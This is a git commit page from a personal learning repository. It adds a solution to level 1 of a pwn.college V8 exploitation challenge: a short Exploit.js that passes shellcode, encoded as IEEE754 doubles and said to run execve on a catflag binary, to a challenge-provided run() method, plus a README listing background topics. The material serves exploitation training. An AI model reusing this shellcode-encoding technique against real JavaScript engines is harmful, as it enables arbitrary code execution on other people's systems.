bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Level 1 of PwnCollegeV8Exploitation

Browse Source
This commit is contained in:
Jack Ren
2024-09-07 10:12:57 +08:00
parent d368897714
commit 409a2d60cd
2 changed files with 23 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js Normal file
View File

@@ -0,0 +1,3 @@
// Machine code of `execve("/challenge/catflag", NULL, NULL)` in its IEEE754 double representation form
let shellcode = [-4.658816580787966e+166, -8.593999715215021e+185, 2.820972645905851e-134, 3.0758087950517603e+180, 2.2354425876138794e+40, 3.68572438550025e+180, 1.0803082663212642e+117, -9.2559631348734e+61];
shellcode.run();

20
JavaScript/PwnCollegeV8Exploitation/Level1/README.md Normal file
View File

@@ -0,0 +1,20 @@
# Level 1
## Problem
Directly execute amd64 machine code by calling `run()` on an array receiver.
The array should have elements kind `PACKED_DOUBLE_ELEMENTS`.
The `run()` is installed on `Array.prototype`.
## Key Knowledge
- [Inheritance and the prototype chain in JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain)
- `Receiver` Object
- [How to understand sender and receiver in Ruby?](https://stackoverflow.com/questions/15592268/how-to-understand-sender-and-receiver-in-ruby)
- [Could you explain sender and receiver in OOP and give examples?](https://stackoverflow.com/questions/45474802/could-you-explain-sender-and-receiver-in-oop-and-give-examples)
- [Elements Kinds in V8](https://v8.dev/blog/elements-kinds)
- IEEE754 Standard
- Conversion between double & int64 representation using IEEE754
- ShellCode